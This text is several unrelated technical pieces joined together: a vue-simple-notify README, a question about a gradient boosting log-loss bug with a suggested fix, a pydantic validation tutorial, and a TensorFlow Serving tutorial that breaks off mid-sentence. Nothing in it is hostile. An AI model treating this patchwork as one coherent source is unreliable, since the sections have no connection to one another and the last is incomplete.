$ npm install vue-simple-notify
Register the component:
import Vue from 'vue'
import VueSimpleNotify from 'VueSimpleNotify'
Vue.component('VueSimpleNotify', VueSimpleNotify)
Use the component:
<vue-simple-notify :items="[]"></vue-simple-notify>
CDN
Include styles:
<link href="https://unpkg.com/vue-simple-notify/dist/vue-simple-notify.min.css" rel="stylesheet">
Include scripts:
<script src="https://unpkg.com/vue/dist/vue.js"></script>
<script src="https://unpkg.com/vue-simple-notify/dist/vue-simple-notify.min.js"></script>
Register the component:
Vue.component('VueSimpleNotify', VueSimpleNotify.VueSimpleNotify)
Use the component:
<vue-simple-notify :items="[]"></vue-simple-notify>
Examples
Examples of use for this component:
- Using CDN:
<!DOCTYPE html>
<html>
<head>
<link href="https://unpkg.com/vue-simple-notify/dist/vue-simple-notify.min.css" rel="stylesheet">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no, minimal-ui">
</head>
<body>
<div id="app">
<vue-simple-notify :items="[]"></vue-simple-notify>
</div>
<script src="https://unpkg.com/vue/dist/vue.js"></script>
<script src="https://unpkg.com/vue-simple-notify/dist/vue-simple-notify.min.js"></script>
<script>
Vue.component('VueSimpleNotify', VueSimpleNotify.VueSimpleNotify)
new Vue().$mount('#app')
</script>
</body>
</html>
- Adding items:
<vue-simple-notify
:items="items"
></vue-simple-notify>
new Vue({
  el: '#app',
  components: { VueSimpleNotify },
  data () {
    return {
      items: [
        {
          message: 'example of error message.'
        },
        {
          type: 'Success',
          color: '#2ecc71',
          dismissable: false,
          message: 'example of success message.'
        }
      ]
    }
  }
})
- Setting the delay between notifications:
<vue-simple-notify
:items="items"
:delay="delay"
></vue-simple-notify>
new Vue({
  el: '#app',
  components: { VueSimpleNotify },
  data () {
    return {
      items: [{}, {}, {}],
      delay: 1000
    }
  }
})
- Listening to the @onDismiss event:
<vue-simple-notify
:items="items"
@onDismiss="onDismiss"
></vue-simple-notify>
new Vue({
  el: '#app',
  components: { VueSimpleNotify },
  data () {
    return {
      items: [{}]
    }
  },
  methods: {
    onDismiss: function onDismiss (index) {
      console.log(index)
    }
  }
})
- Removing items from the component.
<vue-simple-notify
:items="items"
ref="vsn"
></vue-simple-notify>
const vueSimpleNotify = new Vue({
  el: '#app',
  components: { VueSimpleNotify },
  data () {
    return {
      items: [{}, {}, {}]
    }
  }
}).$refs.vsn

vueSimpleNotify.dismiss(1)
- Removing all elements.
<vue-simple-notify
:items="items"
ref="vsn"
></vue-simple-notify>
const vueSimpleNotify = new Vue({
  el: '#app',
  components: { VueSimpleNotify },
  data () {
    return {
      items: [{}, {}, {}]
    }
  }
}).$refs.vsn

vueSimpleNotify.clear()
Props
Available props in this component:
:items
Description: Notifications array.
Type: Array
Required: true
Default: null
<vue-simple-notify :items="[]">
:delay
Description: Time interval between notifications when displayed.
Type: Number
Default: 500
<vue-simple-notify :items="[]" :delay="1000">
Events
Available events in this component:
@onDismiss
It is triggered each time a notification is dismissed.
onDismiss: function onDismiss (index) { }
Attribute Type Description
index Number Notification index.
<vue-simple-notify :items="[]" :delay="1000" @onDismiss="onDismiss">
Methods
Available methods in this component:
dismiss
Dismiss a notification by a index.
vueSimpleNotify.dismiss(index)
Attribute Type Description Required
index Number Notification index. true
clear
Clear all notifications.
vueSimpleNotify.clear()
Tests
Clone the repository:
$ git clone https://github.com/Josantonius/vue-simple-notify.git vue-simple-notify
Go to the directory:
$ cd vue-simple-notify
Install dependencies:
$ npm install
Run unit tests:
$ npm run test
$ npm run lint
Run serve with hot reload:
$ npm run dev
Build distribution with minification:
$ npm run bundle
Build demo for production with minification:
$ npm run build
Run all the above:
$ npm run finish
☑ TODO
[ ] Fix error when trying to pass ESLint tests in Travis CI.
[ ] Fix error when trying to pass E2E tests in Travis CI.
[ ] Add new feature.
[ ] Improve tests.
[ ] Improve documentation.
Contribute
Pull requests
Fork and clone.
Make changes and run the tests.
Create a branch, commit, push and send me a pull request.
License
This project is licensed under MIT license. See the LICENSE file for more info.
Copyright
2018 Josantonius, josantonius.com
If you find it useful, let me know :wink:
Github Repository
Tags: #VueJs
|
I loaded the data and defined the variables, then converted the sample into an array.
df1 = pd.read_csv('gbm-data.csv')
Y = df1['Activity']
X = df1.drop(['Activity'], axis=1)
df2 = df1.values
After splitting the data into training and test sets:
X_train, X_test, y_train, y_test = train_test_split(X1, Y1, test_size=0.8, random_state=241)
I need to train a GradientBoostingClassifier with the parameters n_estimators=250, verbose=True, random_state=241, and for each learning_rate value from the list [1, 0.5, 0.3, 0.2, 0.1] do the following:
Use the staged_decision_function method to predict quality on the training and test sets at each iteration.
Transform the resulting predictions with the sigmoid function using the formula 1 / (1 + e^{-y_pred}), where y_pred is the predicted value.
Compute and plot the log-loss values (which can be calculated with the sklearn.metrics.log_loss function) on the training and test sets, and also find the minimum value of the metric and the iteration number at which it is reached.
I wrote the following code, adapted to build my models and save the results of their computations:
common_args = {'verbose': True, 'n_estimators': 250,'random_state': 241}
models = [('first', GradientBoostingClassifier(learning_rate=1, **common_args)),
('second', GradientBoostingClassifier(learning_rate=0.5, **common_args)),
('third', GradientBoostingClassifier(learning_rate=0.3, **common_args)),
('forth', GradientBoostingClassifier(learning_rate=0.2, **common_args)),
('fifth', GradientBoostingClassifier(learning_rate=0.1, **common_args)),
]
stage_preds = []
final_preds = []
y_pred = []
Lloss = []
sigmaYpred = []
for mname, m in models:
m.fit(X_train, y_train)
stage_preds[mname] = {'X_train': list(m.staged_decision_function(X_train)), 'X_test': list(m.staged_decision_function(X_test))}
y_pred[mname] = {'X_test': m.predict_proba(X_test)}
sigmaYpred[mname] = 1 / (1 + np.exp((-1)*y_pred))
Lloss[mname] = {'y_train': list(log_loss(y_train, sigmaYpred[mname])), 'y_test': list(log_loss(y_test, sigmaYpred[mname]))}
But I keep getting this error:
Traceback (most recent call last): File "", line 15, in stage_preds[mname] = {'X_train': list(m.staged_decision_function(X_train)), 'X_test': list(m.staged_decision_function(X_test))} TypeError: list indices must be integers or slices, not str
How can I fix it so that the results are stored properly?
P.S.: After fixing stage_preds and making it a dictionary:
stage_preds = dict()
The same error appears, but now with y_pred[mname]:
Traceback (most recent call last): File "", line 17, in y_pred[mname] = {'X_test': m.predict_proba(X_test)} TypeError: list indices must be integers or slices, not str
If that variable is defined as a dictionary as well, it becomes impossible to compute the sigmoid (sigmaYpred[mname]), since Python will not know how to combine a dictionary with numbers.
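One way to restructure this so that everything stores cleanly is to make every result container a dictionary and apply the sigmoid per boosting stage (a sketch, not the only possible fix, assuming the same imports: numpy as np and sklearn.metrics.log_loss):
stage_preds = {}
log_losses = {}
for mname, m in models:
    m.fit(X_train, y_train)
    # staged_decision_function yields one score array per boosting iteration
    stage_preds[mname] = {'train': list(m.staged_decision_function(X_train)),
                          'test': list(m.staged_decision_function(X_test))}
    # apply the sigmoid to each stage's scores, then compute log-loss per iteration
    log_losses[mname] = {
        'train': [log_loss(y_train, 1 / (1 + np.exp(-p.ravel()))) for p in stage_preds[mname]['train']],
        'test': [log_loss(y_test, 1 / (1 + np.exp(-p.ravel()))) for p in stage_preds[mname]['test']],
    }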
|
Problem Intro
As a Data Scientist (DS), 80% of our work is dealing with messy data. Our problems include, but are not limited to:
Database id being referenced as _id
Empty values can be referenced as NA, None, "None", "EMPTY"...
Data being passed to you during production requests are wrong
As a DS working with other DS, or as an engineer working with DS, you also run into:
Variable names being reassigned multiple times.
Hard-to-track variable naming conventions.
Code that is context-heavy (e.g. why did the DS divide this number by that aggregation?)
Small Note: pylint/flake8 are also useful to address the above problems.
Pre-req / Setup!
Chop Chop! (Hurry up!)
Code has been prepared for you, just copy and run in your terminal!
You still need to check and/or create the appropriate directory though.
Assuming you are using an Anaconda distribution on Mac/Linux/Docker etc.:
conda create -n typedpy python=3.8
conda activate typedpy
pip install -r requirements.txt
Hello World!
Introducing Typed Python! Here is a simple example using native python and the mypy package.
def add(x:int, y:int) -> int:
"""[Simple addition function]
Args:
x ([int]): [An integer]
y ([int]): [An integer]
"""
return x+y
Suppose a DS decides to use this function for another purpose in a python script,
add("hello, ", "how are you")
"""
# output
# 'hello, how are you'
"""
By using mypy in your terminal where the script exists:
mypy typed_eg1.py
output:
typed_eg1.py:10: error: Argument 1 to "add" has incompatible type "str"; expected "int"
typed_eg1.py:10: error: Argument 2 to "add" has incompatible type "str"; expected "int"
Found 2 errors in 1 file (checked 1 source file)
However, the downside is that the code still runs: type hints alone do nothing at runtime, so the user is never warned about doing something unintended!
Pydantic
Introducing Pydantic!
Everything starts with a BaseModel, like so:
from pydantic import BaseModel
class InputNumbers(BaseModel):
"""
This is where the doc string usually goes
"""
a:int
b:int
mynumbers = InputNumbers(a=10,b=100)
And you can define your function as follows:
def addition(input: InputNumbers) -> int:
return input.a + input.b
input = InputNumbers(a=10,b=100)
input
# InputNumbers(a=10, b=100)
"""
Or you can use dictionary inputs
- useful in handling json requests
"""
input_dict = dict(a=11,b=101)
input2 = InputNumbers(**input_dict)
input2
#InputNumbers(a=11,b=101)
addition(input)
Using a similar example, suppose the user tries to pass in a string:
InputNumbers(a='I am so stupid',b=100)
"""
ValidationError: 1 validation error for InputNumbers
a
value is not a valid integer (type=type_error.integer)
"""
Or the user forgets to input certain values:
InputNumbers(a=10) #b is missing
"""
ValidationError: 1 validation error for InputNumbers
b
field required (type=value_error.missing)
"""
Warning! If Python allows for the conversion, then pydantic will not warn you. Do note that this behavior is intended!
For example, in python it is acceptable to str(1) or int("1")
class Example(BaseModel):
a: int
b: float
c: int
d: str
input_dict = dict(a=1.1, b=1.2, c='4', d=100)
Example(**input_dict)
"""
Example(a=1, b=1.2, c=4, d='100')
"""
Autocomplete
Because we are using Python classes and declaring types in the functions, autocomplete is enabled while developing, speeding up your workflow!
If you are using an IDE, the model's attributes will be suggested as you type.
Outputs
You can also define outputs with pydantic:
from pydantic import BaseModel
class ExampleIn(BaseModel):
a: int
b: int
class ExampleOut(BaseModel):
addition: int
multiplication: int
division: float
def compute_features(input: ExampleIn) -> ExampleOut:
add: int = input.a + input.b
multi: int = input.a * input.b
div: float = input.a / input.b
return ExampleOut(addition=add, multiplication=multi, division=div)
In = ExampleIn(a=10,b=100)
compute_features(In)
"""
ExampleOut(addition=110, multiplication=1000, division=0.1)
"""
Types
The full list of available types can be found in the docs; I will go through the ones most commonly used in my experience.
We will be making use of the Typing library for certain cases. The reason will be explained further below.
Default Values
from pydantic import BaseModel
from typing import Optional
class Example(BaseModel):
required: int #no value specified
default_val: str = 10
optional_val: Optional[int]
Example(required=1)
# Example(required=1, default_val=10, optional_val=None)
Example(required=2,default_val=10)
# Example(required=2, default_val='10', optional_val=None)
Optional Values
from pydantic import BaseModel
from typing import Optional
class Example(BaseModel):
required: int #no value specified
default_val: str = 10
optional_val: Optional[int]
Example(required=3,default_val=20,optional_val=100 )
# Example(required=3, default_val='20', optional_val=100)
Union
from pydantic import BaseModel
from typing import Union
class Example(BaseModel):
required: int #no value specified
default_val: str = 10
optional_val: Union[int,None]
optional_val2: Union[int, str, float]
Aside: Optional is actually Union[..., None]
List, Dict, Any
What if you want to use certain python structures?
Unsure of what data type to use?
from typing import List, Dict, Any
# This will throw an error
var: list[float]
# this will not:
var: List[float]
var2: Dict[str, float]
var3: List[Any]
Enum / IntEnum
You use Enum generally when you want a variable to take in a set of categorical values.
from enum import Enum, IntEnum
class Animal(str,Enum):
DOG: str = 'DOG'
CAT: str = 'CAT'
class Action(int,Enum):
JUMP = 1
SIT = 2
LIEDOWN = 3
PAW = 4
You can use these classes as follows:
Animal.DOG
Animal.DOG.value
Animal["DOG"].value
Complex Models
You can then define models/classes like this:
from typing import List, Dict, Set
from pydantic import BaseModel
from enum import Enum, IntEnum
class Animal(str, Enum):
DOG: str = "DOG"
CAT: str = "CAT"
class Action(IntEnum):
JUMP = 1
SIT = 2
LIEDOWN = 3
PAW = 4
class Pet(BaseModel):
category: Animal
tricks: List[Action]
class Attributes(BaseModel):
age: int
country: str
class House(BaseModel):
Pets: List[Pet]
attributes: Attributes
pet1 = Pet(category=Animal.DOG, tricks=[Action.JUMP, Action.SIT])
pet2 = Pet(category=Animal.CAT, tricks=[Action.LIEDOWN, Action.PAW])
House(Pets=[pet1, pet2], attributes=dict(age=10, country="Singapore"))
"""
House(Pets=[Pet(category=<Animal.DOG: 'DOG'>,
tricks=[<Action.JUMP: 1>, <Action.SIT: 2>]),
Pet(category=<Animal.CAT: 'CAT'>, tricks=[<Action.LIEDOWN: 3>,
<Action.PAW: 4>])], attributes=Attributes(age=10, country='Singapore'))
"""
Validators
This section is largely similar to the docs here and the documentation is pretty good.
Instead, I will highlight some specific notes/details that tend to be overlooked.
In summary, this is what a typical validator looks like:
from pydantic import BaseModel, validator
from datetime import datetime
from time import time
class Account(BaseModel):
account_id: int
date_join: datetime
@validator("date_join")
def time_must_be_before_today(cls, v):
if v > datetime.now():
raise ValueError("Are you from the future?")
return v
Account(account_id=123, date_join=datetime(3000, 12, 1))
"""
ValidationError: 1 validation error for Account
date_join
Are you from the future? (type=value_error)
"""
The way to understand the validator decorator is that it is a class method, and v represents the attribute date_join as specified above.
Also, within the validator, you can choose to edit the variable.
Example:
class Example(BaseModel):
even_num: int
@validator('even_num')
def make_it_even(cls,v):
if v % 2 == 0:
return v
else:
return v+1
Example(even_num=51)
"""
Example(even_num=52)
"""
Handling messy data
Now, suppose your upstream has messy data values. Rather than defining a cleaning function, you can just let pydantic do the job for you.
class CleanData(BaseModel):
value: str
@validator("value")
def change_all(cls,v):
if v in ["empty","NA","NONE","EMPTY","INVALID"]:
v = "not supplied"
return v
This also allows for cleaner scripts and faster workflow. It also isolates the data cleaning in each step of the process.
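For example, a quick check of the validator above:
CleanData(value="NA")
# CleanData(value='not supplied')
CleanData(value="hello world")
# CleanData(value='hello world')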
Exporting
Sometimes you are expected to return the data in JSON format, and certain data types in Python are not natively supported.
For example:
import json
json.dumps(set([1,2,3]))
"""
TypeError: Object of type set is not JSON serializable
"""
class SpecialSet(BaseModel):
myset: set
example = SpecialSet(myset=set([1,2,3]))
example.json()
"""
'{"myset": [1, 2, 3]}'
"""
If you are returning in dictionary, with the earlier example:
house = House(Pets=[pet1, pet2], attributes=dict(age=10, country="Singapore"))
house.dict()
"""
house.dict()
{'Pets': [{'category': <Animal.DOG: 'DOG'>,
'tricks': [<Action.JUMP: 1>, <Action.SIT: 2>]},
{'category': <Animal.CAT: 'CAT'>,
'tricks': [<Action.LIEDOWN: 3>, <Action.PAW: 4>]}],
'attributes': {'age': 10, 'country': 'Singapore'}}
"""
house.json()
"""
'{"Pets": [{"category": "DOG", "tricks": [1, 2]}, {"category": "CAT", "tricks": [3, 4]}], "attributes": {"age": 10, "country": "Singapore"}}'
"""
Note: the full docs can be found here. It is worthwhile taking a look and understanding the other methods available, specifically the exclude/include methods.
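For instance, with the house object from the earlier example, exclude lets you drop a field when exporting (include works the other way around):
house.dict(exclude={"attributes"})
# {'Pets': [{'category': <Animal.DOG: 'DOG'>, 'tricks': [<Action.JUMP: 1>, <Action.SIT: 2>]},
#           {'category': <Animal.CAT: 'CAT'>, 'tricks': [<Action.LIEDOWN: 3>, <Action.PAW: 4>]}]}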
Using Fields
Sometimes, your upstream / downstream:
reference a schema with a different name,
or is prone to schema changes,
or has a different preference between CamelCase and snake_case.
This is where Field customisation becomes very useful.
Here are two examples:
Alias
from pydantic import BaseModel, Field
class Example(BaseModel):
booking_id: int = Field(..., alias="_id", description="This is the booking_id")
example = Example(_id=123)
"""
Example(booking_id=123)
"""
example.json()
"""
'{"booking_id": 123}'
"""
example.json(by_alias=True)
"""
'{"_id": 123}'
"""
By using alias, you are able to have cleaner code, as your application code stays independent of the input/output names required by your requirements docs.
Alias Generators
Suppose you prefer snake_case, but your upstream sends in CamelCase,
from pydantic import BaseModel
def to_camel(string: str) -> str:
return ''.join(word.capitalize() for word in string.split('_'))
class Example(BaseModel):
i_love_camel_case: str
yes_i_really_do: str
class Config:
alias_generator = to_camel
eg = Example(ILoveCamelCase = "TRUE", YesIReallyDo ="YES, REALLY")
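The CamelCase keys are mapped back onto the snake_case attributes, so internally you keep working in snake_case:
eg.i_love_camel_case
# 'TRUE'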
https://pydantic-docs.helpmanual.io/usage/model_config/#alias-generator
Summary
We have seen that with pydantic classes:
You can write application logic that is independent of your upstream/downstream by using alias.
Different values can be imputed or checked with validators.
Variables can also be adjusted within the pydantic class.
Data types are validated before proceeding.
Objects are clean with clear attributes, and functions are statically typed with zero ambiguous inputs and outputs. This also makes testing easier.
Objects can be documented with the help of class docstrings and Field descriptions (versus typical code blocks, where documentation is usually an afterthought).
Additional Readings
The readings below are useful and helped me better appreciate static typing. I recommend reading them, first by skimming and then in detail!
Alternative guide by fastapi
Real python - why should you care about type hints?
Python type checking - guide
Introduction to pep8
|
This guide trains a neural-network model to classify images of clothing, like sneakers and shirts, saves the trained model, and then serves it with TensorFlow Serving. The focus is on TensorFlow Serving, rather than on modeling and training in TensorFlow; for a complete example that focuses on modeling and training, see the Basic Classification example.
This guide uses tf.keras, a high-level API for building and training models in TensorFlow.
import sys
# Confirm that we're using Python 3
assert sys.version_info.major == 3, 'Oops, not running Python 3. Use Runtime > Change runtime type'
# TensorFlow and tf.keras
print("Installing dependencies for Colab environment")
!pip install -Uq grpcio==1.26.0
import tensorflow as tf
from tensorflow import keras
# Helper libraries
import numpy as np
import matplotlib.pyplot as plt
import os
import subprocess
print('TensorFlow version: {}'.format(tf.__version__))
Installing dependencies for Colab environment |████████████████████████████████| 2.4MB 4.6MB/s Installing TensorFlow TensorFlow 2.x selected. TensorFlow version: 2.1.0-rc1
Create your model
Import the Fashion MNIST dataset
This guide uses the Fashion MNIST dataset, which contains 70,000 grayscale images in 10 categories. The images show individual articles of clothing at low resolution (28 by 28 pixels), as seen here:
Figure 1. Fashion-MNIST samples (by Zalando, MIT License).
Fashion MNIST is intended as a drop-in replacement for the classic MNIST dataset, often used as the "Hello, World" of machine-learning programs for computer vision. You can access Fashion MNIST directly from TensorFlow; just import and load the data.
fashion_mnist = keras.datasets.fashion_mnist
(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()
# scale the values to 0.0 to 1.0
train_images = train_images / 255.0
test_images = test_images / 255.0
# reshape for feeding into the model
train_images = train_images.reshape(train_images.shape[0], 28, 28, 1)
test_images = test_images.reshape(test_images.shape[0], 28, 28, 1)
class_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',
'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']
print('\ntrain_images.shape: {}, of {}'.format(train_images.shape, train_images.dtype))
print('test_images.shape: {}, of {}'.format(test_images.shape, test_images.dtype))
Downloading data from https://storage.googleapis.com/tensorflow/tf-keras-datasets/train-labels-idx1-ubyte.gz 32768/29515 [=================================] - 0s 0us/step Downloading data from https://storage.googleapis.com/tensorflow/tf-keras-datasets/train-images-idx3-ubyte.gz 26427392/26421880 [==============================] - 0s 0us/step Downloading data from https://storage.googleapis.com/tensorflow/tf-keras-datasets/t10k-labels-idx1-ubyte.gz 8192/5148 [===============================================] - 0s 0us/step Downloading data from https://storage.googleapis.com/tensorflow/tf-keras-datasets/t10k-images-idx3-ubyte.gz 4423680/4422102 [==============================] - 0s 0us/step train_images.shape: (60000, 28, 28, 1), of float64 test_images.shape: (10000, 28, 28, 1), of float64
Train and evaluate your model
Let's use the simplest possible CNN, since we're not focused on the modeling part.
model = keras.Sequential([
keras.layers.Conv2D(input_shape=(28,28,1), filters=8, kernel_size=3,
strides=2, activation='relu', name='Conv1'),
keras.layers.Flatten(),
keras.layers.Dense(10, activation=tf.nn.softmax, name='Softmax')
])
model.summary()
testing = False
epochs = 5
model.compile(optimizer='adam',
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
model.fit(train_images, train_labels, epochs=epochs)
test_loss, test_acc = model.evaluate(test_images, test_labels)
print('\nTest accuracy: {}'.format(test_acc))
Model: "sequential" _________________________________________________________________ Layer (type) Output Shape Param # ================================================================= Conv1 (Conv2D) (None, 13, 13, 8) 80 _________________________________________________________________ flatten (Flatten) (None, 1352) 0 _________________________________________________________________ Softmax (Dense) (None, 10) 13530 ================================================================= Total params: 13,610 Trainable params: 13,610 Non-trainable params: 0 _________________________________________________________________ Train on 60000 samples Epoch 1/5 60000/60000 [==============================] - 11s 185us/sample - loss: 0.5466 - accuracy: 0.8087 Epoch 2/5 60000/60000 [==============================] - 5s 79us/sample - loss: 0.4032 - accuracy: 0.8580 Epoch 3/5 60000/60000 [==============================] - 5s 76us/sample - loss: 0.3613 - accuracy: 0.8712 Epoch 4/5 60000/60000 [==============================] - 5s 75us/sample - loss: 0.3406 - accuracy: 0.8797 Epoch 5/5 60000/60000 [==============================] - 4s 75us/sample - loss: 0.3247 - accuracy: 0.8848 10000/10000 [==============================] - 1s 73us/sample - loss: 0.3510 - accuracy: 0.8747 Test accuracy: 0.8747000098228455
Save your model
To load our trained model into TensorFlow Serving, we first need to save it in the SavedModel format. This will create a protobuf file in a well-defined directory hierarchy and will include a version number. TensorFlow Serving allows us to select which version of a model, or "servable", we want to use when we make inference requests. Each version will be exported to a different sub-directory under the given path.
# Fetch the Keras session and save the model
# The signature definition is defined by the input and output tensors,
# and stored with the default serving key
import tempfile
MODEL_DIR = tempfile.gettempdir()
version = 1
export_path = os.path.join(MODEL_DIR, str(version))
print('export_path = {}\n'.format(export_path))
tf.keras.models.save_model(
model,
export_path,
overwrite=True,
include_optimizer=True,
save_format=None,
signatures=None,
options=None
)
print('\nSaved model:')
!ls -l {export_path}
export_path = /tmp/1 Warning:tensorflow:From /tensorflow-2.1.0/python3.6/tensorflow_core/python/ops/resource_variable_ops.py:1786: calling BaseResourceVariable.__init__ (from tensorflow.python.ops.resource_variable_ops) with constraint is deprecated and will be removed in a future version. Instructions for updating: If using Keras pass *_constraint arguments to layers. INFO:tensorflow:Assets written to: /tmp/1/assets Saved model: total 84 drwxr-xr-x 2 root root 4096 Jan 7 23:15 assets -rw-r--r-- 1 root root 74086 Jan 7 23:15 saved_model.pb drwxr-xr-x 2 root root 4096 Jan 7 23:15 variables
Examine your saved model
We'll use the saved_model_cli command-line utility to look at the MetaGraphDefs (the models) and SignatureDefs (the methods you can call) in our SavedModel. See this discussion of the SavedModel CLI in the TensorFlow Guide.
!saved_model_cli show --dir {export_path} --all
MetaGraphDef with tag-set: 'serve' contains the following SignatureDefs: signature_def['__saved_model_init_op']: The given SavedModel SignatureDef contains the following input(s): The given SavedModel SignatureDef contains the following output(s): outputs['__saved_model_init_op'] tensor_info: dtype: DT_INVALID shape: unknown_rank name: NoOp Method name is: signature_def['serving_default']: The given SavedModel SignatureDef contains the following input(s): inputs['Conv1_input'] tensor_info: dtype: DT_FLOAT shape: (-1, 28, 28, 1) name: serving_default_Conv1_input:0 The given SavedModel SignatureDef contains the following output(s): outputs['Softmax'] tensor_info: dtype: DT_FLOAT shape: (-1, 10) name: StatefulPartitionedCall:0 Method name is: tensorflow/serving/predict WARNING:tensorflow:From /tensorflow-2.1.0/python3.6/tensorflow_core/python/ops/resource_variable_ops.py:1786: calling BaseResourceVariable.__init__ (from tensorflow.python.ops.resource_variable_ops) with constraint is deprecated and will be removed in a future version. Instructions for updating: If using Keras pass *_constraint arguments to layers. Defined Functions: Function Name: '__call__' Option #1 Callable with: Argument #1 Conv1_input: TensorSpec(shape=(None, 28, 28, 1), dtype=tf.float32, name='Conv1_input') Argument #2 DType: bool Value: True Argument #3 DType: NoneType Value: None Option #2 Callable with: Argument #1 inputs: TensorSpec(shape=(None, 28, 28, 1), dtype=tf.float32, name='inputs') Argument #2 DType: bool Value: True Argument #3 DType: NoneType Value: None Option #3 Callable with: Argument #1 inputs: TensorSpec(shape=(None, 28, 28, 1), dtype=tf.float32, name='inputs') Argument #2 DType: bool Value: False Argument #3 DType: NoneType Value: None Option #4 Callable with: Argument #1 Conv1_input: TensorSpec(shape=(None, 28, 28, 1), dtype=tf.float32, name='Conv1_input') Argument #2 DType: bool Value: False Argument #3 DType: NoneType Value: None Function Name: '_default_save_signature' Option #1 Callable with: Argument #1 Conv1_input: TensorSpec(shape=(None, 28, 28, 1), dtype=tf.float32, name='Conv1_input') Function Name: 'call_and_return_all_conditional_losses' Option #1 Callable with: Argument #1 inputs: TensorSpec(shape=(None, 28, 28, 1), dtype=tf.float32, name='inputs') Argument #2 DType: bool Value: True Argument #3 DType: NoneType Value: None Option #2 Callable with: Argument #1 inputs: TensorSpec(shape=(None, 28, 28, 1), dtype=tf.float32, name='inputs') Argument #2 DType: bool Value: False Argument #3 DType: NoneType Value: None Option #3 Callable with: Argument #1 Conv1_input: TensorSpec(shape=(None, 28, 28, 1), dtype=tf.float32, name='Conv1_input') Argument #2 DType: bool Value: False Argument #3 DType: NoneType Value: None Option #4 Callable with: Argument #1 Conv1_input: TensorSpec(shape=(None, 28, 28, 1), dtype=tf.float32, name='Conv1_input') Argument #2 DType: bool Value: True Argument #3 DType: NoneType Value: None
That tells us a lot about our model! In this case we just trained our model, so we already know the inputs and outputs, but if we didn't, this would be important information. It doesn't tell us everything, like the fact that this is grayscale image data, for example, but it's a great start.
Serve your model with TensorFlow Serving
Add the TensorFlow Serving distribution URI as a package source:
We're preparing to install TensorFlow Serving using Aptitude, since this Colab runs in a Debian environment. We'll add the tensorflow-model-server package to the list of packages that Aptitude knows about. Note that we're running as root.
# This is the same as you would do from your command line, but without the [arch=amd64], and no sudo
# You would instead do:
# echo "deb [arch=amd64] http://storage.googleapis.com/tensorflow-serving-apt stable tensorflow-model-server tensorflow-model-server-universal" | sudo tee /etc/apt/sources.list.d/tensorflow-serving.list && \
# curl https://storage.googleapis.com/tensorflow-serving-apt/tensorflow-serving.release.pub.gpg | sudo apt-key add -
!echo "deb http://storage.googleapis.com/tensorflow-serving-apt stable tensorflow-model-server tensorflow-model-server-universal" | tee /etc/apt/sources.list.d/tensorflow-serving.list && \
curl https://storage.googleapis.com/tensorflow-serving-apt/tensorflow-serving.release.pub.gpg | apt-key add -
!apt update
deb http://storage.googleapis.com/tensorflow-serving-apt stable tensorflow-model-server tensorflow-model-server-universal % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 2943 100 2943 0 0 11496 0 --:--:-- --:--:-- --:--:-- 11496 OK Get:1 http://storage.googleapis.com/tensorflow-serving-apt stable InRelease [3,012 B] Get:2 https://cloud.r-project.org/bin/linux/ubuntu bionic-cran35/ InRelease [3,626 B] Ign:3 https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1804/x86_64 InRelease Ign:4 https://developer.download.nvidia.com/compute/machine-learning/repos/ubuntu1804/x86_64 InRelease Hit:5 https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1804/x86_64 Release Get:6 https://developer.download.nvidia.com/compute/machine-learning/repos/ubuntu1804/x86_64 Release [564 B] Get:7 https://developer.download.nvidia.com/compute/machine-learning/repos/ubuntu1804/x86_64 Release.gpg [833 B] Hit:8 http://ppa.launchpad.net/graphics-drivers/ppa/ubuntu bionic InRelease Hit:9 http://archive.ubuntu.com/ubuntu bionic InRelease Get:10 http://security.ubuntu.com/ubuntu bionic-security InRelease [88.7 kB] Get:11 http://storage.googleapis.com/tensorflow-serving-apt stable/tensorflow-model-server amd64 Packages [354 B] Get:12 https://cloud.r-project.org/bin/linux/ubuntu bionic-cran35/ Packages [81.6 kB] Get:13 http://archive.ubuntu.com/ubuntu bionic-updates InRelease [88.7 kB] Get:14 http://storage.googleapis.com/tensorflow-serving-apt stable/tensorflow-model-server-universal amd64 Packages [364 B] Get:15 http://ppa.launchpad.net/marutter/c2d4u3.5/ubuntu bionic InRelease [15.4 kB] Get:17 https://developer.download.nvidia.com/compute/machine-learning/repos/ubuntu1804/x86_64 Packages [30.4 kB] Get:18 http://archive.ubuntu.com/ubuntu bionic-backports InRelease [74.6 kB] Get:19 http://ppa.launchpad.net/marutter/c2d4u3.5/ubuntu bionic/main Sources [1,749 kB] Get:20 http://security.ubuntu.com/ubuntu bionic-security/universe amd64 Packages [796 kB] Get:21 http://archive.ubuntu.com/ubuntu bionic-updates/main amd64 Packages [1,073 kB] Get:22 http://security.ubuntu.com/ubuntu bionic-security/main amd64 Packages [776 kB] Get:23 http://security.ubuntu.com/ubuntu bionic-security/restricted amd64 Packages [21.3 kB] Get:24 http://archive.ubuntu.com/ubuntu bionic-updates/multiverse amd64 Packages [10.8 kB] Get:25 http://archive.ubuntu.com/ubuntu bionic-updates/universe amd64 Packages [1,324 kB] Get:26 http://archive.ubuntu.com/ubuntu bionic-updates/restricted amd64 Packages [35.5 kB] Get:27 http://ppa.launchpad.net/marutter/c2d4u3.5/ubuntu bionic/main amd64 Packages [844 kB] Fetched 7,019 kB in 4s (1,913 kB/s) Reading package lists... Done Building dependency tree Reading state information... Done 21 packages can be upgraded. Run 'apt list --upgradable' to see them.
Install TensorFlow Serving
This is all you need: one command line!
!apt-get install tensorflow-model-server
Reading package lists... Done Building dependency tree Reading state information... Done The following package was automatically installed and is no longer required: libnvidia-common-430 Use 'apt autoremove' to remove it. The following NEW packages will be installed: tensorflow-model-server 0 upgraded, 1 newly installed, 0 to remove and 21 not upgraded. Need to get 140 MB of archives. After this operation, 0 B of additional disk space will be used. Get:1 http://storage.googleapis.com/tensorflow-serving-apt stable/tensorflow-model-server amd64 tensorflow-model-server all 2.0.0 [140 MB] Fetched 140 MB in 2s (78.8 MB/s) Selecting previously unselected package tensorflow-model-server. (Reading database ... 145674 files and directories currently installed.) Preparing to unpack .../tensorflow-model-server_2.0.0_all.deb ... Unpacking tensorflow-model-server (2.0.0) ... Setting up tensorflow-model-server (2.0.0) ...
Start running TensorFlow Serving
This is where we start running TensorFlow Serving and load our model. After it loads, we can start making inference requests using REST. There are some important parameters:
